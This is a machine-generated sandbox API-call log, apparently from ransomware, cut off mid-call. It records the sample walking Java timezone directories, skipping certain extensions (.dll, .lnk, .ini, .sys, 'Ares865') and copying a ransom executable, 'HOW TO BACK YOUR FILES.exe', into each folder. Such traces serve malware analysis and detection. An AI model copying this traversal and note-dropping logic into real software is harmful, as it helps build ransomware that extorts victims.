lpFindFileData=0x2e2e610*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x745a1760, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x745a1760, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x745a1760, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x42c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Yellowknife", cAlternateFileName="YELLOW~1")) returned 0 [0056.052] FindClose (in: hFindFile=0x2cd068 | out: hFindFile=0x2cd068) returned 1 [0056.052] RtlInterlockedPopEntrySList (in: ListHead=0x2e77d0 | out: ListHead=0x2e77d0) returned 0x2d2368 [0056.052] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\North_Dakota", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\North_Dakota") returned="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\North_Dakota" [0056.052] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2effc8 | out: hHeap=0x2b0000) returned 1 [0056.052] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2360 | out: hHeap=0x2b0000) returned 1 [0056.052] lstrlenW (lpString="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\North_Dakota") returned 60 [0056.052] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\North_Dakota" | out: lpString1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\North_Dakota") returned="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\North_Dakota" [0056.052] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0056.052] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\North_Dakota\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\north_dakota\\how to back your files.exe"), bFailIfExists=1) returned 1 [0056.070] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0056.070] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\North_Dakota\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7457b600, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x52ecc100, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x52ecc100, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd068 [0056.071] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0056.071] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0056.071] FindNextFileW (in: hFindFile=0x2cd068, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7457b600, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x52ecc100, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x52ecc100, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0056.071] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0056.071] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0056.071] lstrcpyW (in: lpString1=0x2e2e8da, lpString2="Beulah" | out: lpString1="Beulah") returned="Beulah" [0056.071] lstrlenW (lpString="Beulah") returned 6 [0056.071] lstrlenW (lpString="Ares865") returned 7 [0056.071] lstrlenW (lpString=".dll") returned 4 [0056.071] lstrcmpiW (lpString1="Beulah", lpString2=".dll") returned 1 [0056.071] lstrlenW (lpString=".lnk") returned 4 [0056.071] lstrcmpiW (lpString1="Beulah", lpString2=".lnk") returned 1 [0056.071] lstrlenW (lpString=".ini") returned 4 [0056.071] lstrcmpiW (lpString1="Beulah", lpString2=".ini") returned 1 [0056.071] lstrlenW (lpString=".sys") returned 4 [0056.071] lstrcmpiW (lpString1="Beulah", lpString2=".sys") returned 1 [0056.071] lstrlenW (lpString="Beulah") returned 6 [0056.071] lstrcpyW (in: lpString1=0x2e2e8da, lpString2="Center" | out: lpString1="Center") returned="Center" [0056.071] lstrlenW (lpString="Center") returned 6 [0056.071] lstrlenW (lpString="Ares865") returned 7 [0056.071] lstrlenW (lpString=".dll") returned 4 [0056.071] lstrcmpiW (lpString1="Center", lpString2=".dll") returned 1 [0056.071] lstrlenW (lpString=".lnk") returned 4 [0056.071] lstrcmpiW (lpString1="Center", lpString2=".lnk") returned 1 [0056.072] lstrlenW (lpString=".ini") returned 4 [0056.072] lstrcmpiW (lpString1="Center", lpString2=".ini") returned 1 [0056.072] lstrlenW (lpString=".sys") returned 4 [0056.072] lstrcmpiW (lpString1="Center", lpString2=".sys") returned 1 [0056.072] lstrlenW (lpString="Center") returned 6 [0056.072] lstrcpyW (in: lpString1=0x2e2e8da, lpString2="New_Salem" | out: lpString1="New_Salem") returned="New_Salem" [0056.072] lstrlenW (lpString="New_Salem") returned 9 [0056.072] lstrlenW (lpString="Ares865") returned 7 [0056.072] lstrcmpiW (lpString1="w_Salem", lpString2="Ares865") returned 1 [0056.072] lstrlenW (lpString=".dll") returned 4 [0056.072] lstrcmpiW (lpString1="New_Salem", lpString2=".dll") returned 1 [0056.072] lstrlenW (lpString=".lnk") returned 4 [0056.072] lstrcmpiW (lpString1="New_Salem", lpString2=".lnk") returned 1 [0056.072] lstrlenW (lpString=".ini") returned 4 [0056.072] lstrcmpiW (lpString1="New_Salem", lpString2=".ini") returned 1 [0056.072] lstrlenW (lpString=".sys") returned 4 [0056.072] lstrcmpiW (lpString1="New_Salem", lpString2=".sys") returned 1 [0056.072] lstrlenW (lpString="New_Salem") returned 9 [0056.072] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Kentucky", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Kentucky") returned="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Kentucky" [0056.072] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c1688 | out: hHeap=0x2b0000) returned 1 [0056.072] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d22e0 | out: hHeap=0x2b0000) returned 1 [0056.072] lstrlenW (lpString="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Kentucky") returned 56 [0056.072] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Kentucky" | out: lpString1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Kentucky") returned="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Kentucky" [0056.072] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0056.072] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Kentucky\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\kentucky\\how to back your files.exe"), bFailIfExists=1) returned 1 [0056.082] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0056.082] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Kentucky\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7457b600, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x52ef2260, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x52ef2260, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd068 [0056.082] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0056.082] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0056.082] lstrcpyW (in: lpString1=0x2e2e8d2, lpString2="Louisville" | out: lpString1="Louisville") returned="Louisville" [0056.082] lstrlenW (lpString="Louisville") returned 10 [0056.082] lstrlenW (lpString="Ares865") returned 7 [0056.082] lstrcmpiW (lpString1="isville", lpString2="Ares865") returned 1 [0056.083] lstrlenW (lpString=".dll") returned 4 [0056.083] lstrcmpiW (lpString1="Louisville", lpString2=".dll") returned 1 [0056.083] lstrlenW (lpString=".lnk") returned 4 [0056.083] lstrcmpiW (lpString1="Louisville", lpString2=".lnk") returned 1 [0056.083] lstrlenW (lpString=".ini") returned 4 [0056.083] lstrcmpiW (lpString1="Louisville", lpString2=".ini") returned 1 [0056.083] lstrlenW (lpString=".sys") returned 4 [0056.083] lstrcmpiW (lpString1="Louisville", lpString2=".sys") returned 1 [0056.083] lstrlenW (lpString="Louisville") returned 10 [0056.083] lstrcpyW (in: lpString1=0x2e2e8d2, lpString2="Monticello" | out: lpString1="Monticello") returned="Monticello" [0056.083] lstrlenW (lpString="Monticello") returned 10 [0056.083] lstrlenW (lpString="Ares865") returned 7 [0056.083] lstrcmpiW (lpString1="ticello", lpString2="Ares865") returned 1 [0056.083] lstrlenW (lpString=".dll") returned 4 [0056.083] lstrcmpiW (lpString1="Monticello", lpString2=".dll") returned 1 [0056.083] lstrlenW (lpString=".lnk") returned 4 [0056.083] lstrcmpiW (lpString1="Monticello", lpString2=".lnk") returned 1 [0056.083] lstrlenW (lpString=".ini") returned 4 [0056.083] lstrcmpiW (lpString1="Monticello", lpString2=".ini") returned 1 [0056.083] lstrlenW (lpString=".sys") returned 4 [0056.083] lstrcmpiW (lpString1="Monticello", lpString2=".sys") returned 1 [0056.083] lstrlenW (lpString="Monticello") returned 10 [0056.083] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Indiana", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Indiana") returned="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Indiana" [0056.083] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d3750 | out: hHeap=0x2b0000) returned 1 [0056.083] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2340 | out: hHeap=0x2b0000) returned 1 [0056.083] lstrlenW (lpString="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Indiana") returned 55 [0056.083] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Indiana" | out: lpString1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Indiana") returned="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Indiana" [0056.083] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0056.083] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Indiana\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\indiana\\how to back your files.exe"), bFailIfExists=1) returned 1 [0056.118] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0056.118] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Indiana\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x745554a0, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x52f3e520, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x52f3e520, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd068 [0056.118] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0056.118] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0056.118] lstrcpyW (in: lpString1=0x2e2e8d0, lpString2="Indianapolis" | out: lpString1="Indianapolis") returned="Indianapolis" [0056.118] lstrlenW (lpString="Indianapolis") returned 12 [0056.118] lstrlenW (lpString="Ares865") returned 7 [0056.118] lstrcmpiW (lpString1="napolis", lpString2="Ares865") returned 1 [0056.118] lstrlenW (lpString=".dll") returned 4 [0056.118] lstrcmpiW (lpString1="Indianapolis", lpString2=".dll") returned 1 [0056.118] lstrlenW (lpString=".lnk") returned 4 [0056.118] lstrcmpiW (lpString1="Indianapolis", lpString2=".lnk") returned 1 [0056.118] lstrlenW (lpString=".ini") returned 4 [0056.118] lstrcmpiW (lpString1="Indianapolis", lpString2=".ini") returned 1 [0056.118] lstrlenW (lpString=".sys") returned 4 [0056.118] lstrcmpiW (lpString1="Indianapolis", lpString2=".sys") returned 1 [0056.118] lstrlenW (lpString="Indianapolis") returned 12 [0056.119] lstrcpyW (in: lpString1=0x2e2e8d0, lpString2="Knox" | out: lpString1="Knox") returned="Knox" [0056.119] lstrlenW (lpString="Knox") returned 4 [0056.119] lstrlenW (lpString="Ares865") returned 7 [0056.119] lstrlenW (lpString=".dll") returned 4 [0056.119] lstrlenW (lpString=".lnk") returned 4 [0056.119] lstrlenW (lpString=".ini") returned 4 [0056.119] lstrlenW (lpString=".sys") returned 4 [0056.119] lstrlenW (lpString="Knox") returned 4 [0056.119] lstrcpyW (in: lpString1=0x2e2e8d0, lpString2="Marengo" | out: lpString1="Marengo") returned="Marengo" [0056.119] lstrlenW (lpString="Marengo") returned 7 [0056.119] lstrlenW (lpString="Ares865") returned 7 [0056.119] lstrlenW (lpString=".dll") returned 4 [0056.119] lstrcmpiW (lpString1="Marengo", lpString2=".dll") returned 1 [0056.119] lstrlenW (lpString=".lnk") returned 4 [0056.119] lstrcmpiW (lpString1="Marengo", lpString2=".lnk") returned 1 [0056.119] lstrlenW (lpString=".ini") returned 4 [0056.119] lstrcmpiW (lpString1="Marengo", lpString2=".ini") returned 1 [0056.119] lstrlenW (lpString=".sys") returned 4 [0056.119] lstrcmpiW (lpString1="Marengo", lpString2=".sys") returned 1 [0056.119] lstrlenW (lpString="Marengo") returned 7 [0056.119] lstrcpyW (in: lpString1=0x2e2e8d0, lpString2="Petersburg" | out: lpString1="Petersburg") returned="Petersburg" [0056.119] lstrlenW (lpString="Petersburg") returned 10 [0056.119] lstrlenW (lpString="Ares865") returned 7 [0056.119] lstrcmpiW (lpString1="ersburg", lpString2="Ares865") returned 1 [0056.119] lstrlenW (lpString=".dll") returned 4 [0056.119] lstrcmpiW (lpString1="Petersburg", lpString2=".dll") returned 1 [0056.119] lstrlenW (lpString=".lnk") returned 4 [0056.119] lstrcmpiW (lpString1="Petersburg", lpString2=".lnk") returned 1 [0056.119] lstrlenW (lpString=".ini") returned 4 [0056.119] lstrcmpiW (lpString1="Petersburg", lpString2=".ini") returned 1 [0056.120] lstrlenW (lpString=".sys") returned 4 [0056.120] lstrcmpiW (lpString1="Petersburg", lpString2=".sys") returned 1 [0056.120] lstrlenW (lpString="Petersburg") returned 10 [0056.120] lstrcpyW (in: lpString1=0x2e2e8d0, lpString2="Tell_City" | out: lpString1="Tell_City") returned="Tell_City" [0056.120] lstrlenW (lpString="Tell_City") returned 9 [0056.120] lstrlenW (lpString="Ares865") returned 7 [0056.120] lstrcmpiW (lpString1="ll_City", lpString2="Ares865") returned 1 [0056.120] lstrlenW (lpString=".dll") returned 4 [0056.120] lstrcmpiW (lpString1="Tell_City", lpString2=".dll") returned 1 [0056.120] lstrlenW (lpString=".lnk") returned 4 [0056.120] lstrcmpiW (lpString1="Tell_City", lpString2=".lnk") returned 1 [0056.120] lstrlenW (lpString=".ini") returned 4 [0056.120] lstrcmpiW (lpString1="Tell_City", lpString2=".ini") returned 1 [0056.120] lstrlenW (lpString=".sys") returned 4 [0056.120] lstrcmpiW (lpString1="Tell_City", lpString2=".sys") returned 1 [0056.120] lstrlenW (lpString="Tell_City") returned 9 [0056.120] lstrcpyW (in: lpString1=0x2e2e8d0, lpString2="Vevay" | out: lpString1="Vevay") returned="Vevay" [0056.120] lstrlenW (lpString="Vevay") returned 5 [0056.120] lstrlenW (lpString="Ares865") returned 7 [0056.120] lstrlenW (lpString=".dll") returned 4 [0056.120] lstrcmpiW (lpString1="Vevay", lpString2=".dll") returned 1 [0056.120] lstrlenW (lpString=".lnk") returned 4 [0056.120] lstrcmpiW (lpString1="Vevay", lpString2=".lnk") returned 1 [0056.120] lstrlenW (lpString=".ini") returned 4 [0056.120] lstrcmpiW (lpString1="Vevay", lpString2=".ini") returned 1 [0056.120] lstrlenW (lpString=".sys") returned 4 [0056.120] lstrcmpiW (lpString1="Vevay", lpString2=".sys") returned 1 [0056.120] lstrlenW (lpString="Vevay") returned 5 [0056.120] lstrcpyW (in: lpString1=0x2e2e8d0, lpString2="Vincennes" | out: lpString1="Vincennes") returned="Vincennes" [0056.120] lstrlenW (lpString="Vincennes") returned 9 [0056.120] lstrlenW (lpString="Ares865") returned 7 [0056.121] lstrcmpiW (lpString1="ncennes", lpString2="Ares865") returned 1 [0056.121] lstrlenW (lpString=".dll") returned 4 [0056.121] lstrcmpiW (lpString1="Vincennes", lpString2=".dll") returned 1 [0056.121] lstrlenW (lpString=".lnk") returned 4 [0056.121] lstrcmpiW (lpString1="Vincennes", lpString2=".lnk") returned 1 [0056.121] lstrlenW (lpString=".ini") returned 4 [0056.121] lstrcmpiW (lpString1="Vincennes", lpString2=".ini") returned 1 [0056.121] lstrlenW (lpString=".sys") returned 4 [0056.121] lstrcmpiW (lpString1="Vincennes", lpString2=".sys") returned 1 [0056.121] lstrlenW (lpString="Vincennes") returned 9 [0056.121] lstrcpyW (in: lpString1=0x2e2e8d0, lpString2="Winamac" | out: lpString1="Winamac") returned="Winamac" [0056.121] lstrlenW (lpString="Winamac") returned 7 [0056.121] lstrlenW (lpString="Ares865") returned 7 [0056.121] lstrlenW (lpString=".dll") returned 4 [0056.121] lstrcmpiW (lpString1="Winamac", lpString2=".dll") returned 1 [0056.121] lstrlenW (lpString=".lnk") returned 4 [0056.121] lstrcmpiW (lpString1="Winamac", lpString2=".lnk") returned 1 [0056.121] lstrlenW (lpString=".ini") returned 4 [0056.121] lstrcmpiW (lpString1="Winamac", lpString2=".ini") returned 1 [0056.121] lstrlenW (lpString=".sys") returned 4 [0056.121] lstrcmpiW (lpString1="Winamac", lpString2=".sys") returned 1 [0056.121] lstrlenW (lpString="Winamac") returned 7 [0056.121] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Argentina", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Argentina") returned="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Argentina" [0056.121] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c1608 | out: hHeap=0x2b0000) returned 1 [0056.121] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2280 | out: hHeap=0x2b0000) returned 1 [0056.121] lstrlenW (lpString="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Argentina") returned 57 [0056.121] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Argentina" | out: lpString1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Argentina") returned="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Argentina" [0056.121] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0056.121] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Argentina\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\argentina\\how to back your files.exe"), bFailIfExists=1) returned 1 [0056.133] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0056.133] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Argentina\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7452f340, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x52f64680, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x52f64680, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd068 [0056.133] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0056.133] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0056.134] lstrcpyW (in: lpString1=0x2e2e8d4, lpString2="Buenos_Aires" | out: lpString1="Buenos_Aires") returned="Buenos_Aires" [0056.134] lstrlenW (lpString="Buenos_Aires") returned 12 [0056.134] lstrlenW (lpString="Ares865") returned 7 [0056.134] lstrcmpiW (lpString1="s_Aires", lpString2="Ares865") returned 1 [0056.134] lstrlenW (lpString=".dll") returned 4 [0056.134] lstrcmpiW (lpString1="Buenos_Aires", lpString2=".dll") returned 1 [0056.134] lstrlenW (lpString=".lnk") returned 4 [0056.134] lstrcmpiW (lpString1="Buenos_Aires", lpString2=".lnk") returned 1 [0056.134] lstrlenW (lpString=".ini") returned 4 [0056.134] lstrcmpiW (lpString1="Buenos_Aires", lpString2=".ini") returned 1 [0056.134] lstrlenW (lpString=".sys") returned 4 [0056.134] lstrcmpiW (lpString1="Buenos_Aires", lpString2=".sys") returned 1 [0056.134] lstrlenW (lpString="Buenos_Aires") returned 12 [0056.134] lstrcpyW (in: lpString1=0x2e2e8d4, lpString2="Catamarca" | out: lpString1="Catamarca") returned="Catamarca" [0056.134] lstrlenW (lpString="Catamarca") returned 9 [0056.134] lstrlenW (lpString="Ares865") returned 7 [0056.134] lstrcmpiW (lpString1="tamarca", lpString2="Ares865") returned 1 [0056.134] lstrlenW (lpString=".dll") returned 4 [0056.134] lstrcmpiW (lpString1="Catamarca", lpString2=".dll") returned 1 [0056.134] lstrlenW (lpString=".lnk") returned 4 [0056.134] lstrcmpiW (lpString1="Catamarca", lpString2=".lnk") returned 1 [0056.134] lstrlenW (lpString=".ini") returned 4 [0056.134] lstrcmpiW (lpString1="Catamarca", lpString2=".ini") returned 1 [0056.134] lstrlenW (lpString=".sys") returned 4 [0056.134] lstrcmpiW (lpString1="Catamarca", lpString2=".sys") returned 1 [0056.134] lstrlenW (lpString="Catamarca") returned 9 [0056.135] lstrcpyW (in: lpString1=0x2e2e8d4, lpString2="Cordoba" | out: lpString1="Cordoba") returned="Cordoba" [0056.135] lstrlenW (lpString="Cordoba") returned 7 [0056.135] lstrlenW (lpString="Ares865") returned 7 [0056.135] lstrlenW (lpString=".dll") returned 4 [0056.135] lstrcmpiW (lpString1="Cordoba", lpString2=".dll") returned 1 [0056.135] lstrlenW (lpString=".lnk") returned 4 [0056.135] lstrcmpiW (lpString1="Cordoba", lpString2=".lnk") returned 1 [0056.135] lstrlenW (lpString=".ini") returned 4 [0056.135] lstrcmpiW (lpString1="Cordoba", lpString2=".ini") returned 1 [0056.135] lstrlenW (lpString=".sys") returned 4 [0056.135] lstrcmpiW (lpString1="Cordoba", lpString2=".sys") returned 1 [0056.135] lstrlenW (lpString="Cordoba") returned 7 [0056.135] lstrcpyW (in: lpString1=0x2e2e8d4, lpString2="Jujuy" | out: lpString1="Jujuy") returned="Jujuy" [0056.135] lstrlenW (lpString="Jujuy") returned 5 [0056.135] lstrlenW (lpString="Ares865") returned 7 [0056.135] lstrlenW (lpString=".dll") returned 4 [0056.135] lstrcmpiW (lpString1="Jujuy", lpString2=".dll") returned 1 [0056.135] lstrlenW (lpString=".lnk") returned 4 [0056.135] lstrcmpiW (lpString1="Jujuy", lpString2=".lnk") returned 1 [0056.135] lstrlenW (lpString=".ini") returned 4 [0056.135] lstrcmpiW (lpString1="Jujuy", lpString2=".ini") returned 1 [0056.135] lstrlenW (lpString=".sys") returned 4 [0056.135] lstrcmpiW (lpString1="Jujuy", lpString2=".sys") returned 1 [0056.135] lstrlenW (lpString="Jujuy") returned 5 [0056.135] lstrcpyW (in: lpString1=0x2e2e8d4, lpString2="La_Rioja" | out: lpString1="La_Rioja") returned="La_Rioja" [0056.135] lstrlenW (lpString="La_Rioja") returned 8 [0056.135] lstrlenW (lpString="Ares865") returned 7 [0056.135] lstrcmpiW (lpString1="a_Rioja", lpString2="Ares865") returned -1 [0056.135] lstrlenW (lpString=".dll") returned 4 [0056.135] lstrcmpiW (lpString1="La_Rioja", lpString2=".dll") returned 1 [0056.135] lstrlenW (lpString=".lnk") returned 4 [0056.135] lstrcmpiW (lpString1="La_Rioja", lpString2=".lnk") returned 1 [0056.135] lstrlenW (lpString=".ini") returned 4 [0056.136] lstrcmpiW (lpString1="La_Rioja", lpString2=".ini") returned 1 [0056.136] lstrlenW (lpString=".sys") returned 4 [0056.136] lstrcmpiW (lpString1="La_Rioja", lpString2=".sys") returned 1 [0056.136] lstrlenW (lpString="La_Rioja") returned 8 [0056.136] lstrcpyW (in: lpString1=0x2e2e8d4, lpString2="Mendoza" | out: lpString1="Mendoza") returned="Mendoza" [0056.136] lstrlenW (lpString="Mendoza") returned 7 [0056.136] lstrlenW (lpString="Ares865") returned 7 [0056.136] lstrlenW (lpString=".dll") returned 4 [0056.136] lstrcmpiW (lpString1="Mendoza", lpString2=".dll") returned 1 [0056.136] lstrlenW (lpString=".lnk") returned 4 [0056.136] lstrcmpiW (lpString1="Mendoza", lpString2=".lnk") returned 1 [0056.136] lstrlenW (lpString=".ini") returned 4 [0056.136] lstrcmpiW (lpString1="Mendoza", lpString2=".ini") returned 1 [0056.136] lstrlenW (lpString=".sys") returned 4 [0056.136] lstrcmpiW (lpString1="Mendoza", lpString2=".sys") returned 1 [0056.136] lstrlenW (lpString="Mendoza") returned 7 [0056.136] lstrcpyW (in: lpString1=0x2e2e8d4, lpString2="Rio_Gallegos" | out: lpString1="Rio_Gallegos") returned="Rio_Gallegos" [0056.136] lstrlenW (lpString="Rio_Gallegos") returned 12 [0056.136] lstrlenW (lpString="Ares865") returned 7 [0056.136] lstrcmpiW (lpString1="allegos", lpString2="Ares865") returned -1 [0056.136] lstrlenW (lpString=".dll") returned 4 [0056.136] lstrcmpiW (lpString1="Rio_Gallegos", lpString2=".dll") returned 1 [0056.136] lstrlenW (lpString=".lnk") returned 4 [0056.136] lstrcmpiW (lpString1="Rio_Gallegos", lpString2=".lnk") returned 1 [0056.136] lstrlenW (lpString=".ini") returned 4 [0056.136] lstrcmpiW (lpString1="Rio_Gallegos", lpString2=".ini") returned 1 [0056.136] lstrlenW (lpString=".sys") returned 4 [0056.136] lstrcmpiW (lpString1="Rio_Gallegos", lpString2=".sys") returned 1 [0056.136] lstrlenW (lpString="Rio_Gallegos") returned 12 [0056.136] lstrcpyW (in: lpString1=0x2e2e8d4, lpString2="Salta" | out: lpString1="Salta") returned="Salta" [0056.137] lstrlenW (lpString="Salta") returned 5 [0056.137] lstrlenW (lpString="Ares865") returned 7 [0056.137] lstrlenW (lpString=".dll") returned 4 [0056.137] lstrcmpiW (lpString1="Salta", lpString2=".dll") returned 1 [0056.137] lstrlenW (lpString=".lnk") returned 4 [0056.137] lstrcmpiW (lpString1="Salta", lpString2=".lnk") returned 1 [0056.137] lstrlenW (lpString=".ini") returned 4 [0056.137] lstrcmpiW (lpString1="Salta", lpString2=".ini") returned 1 [0056.137] lstrlenW (lpString=".sys") returned 4 [0056.137] lstrcmpiW 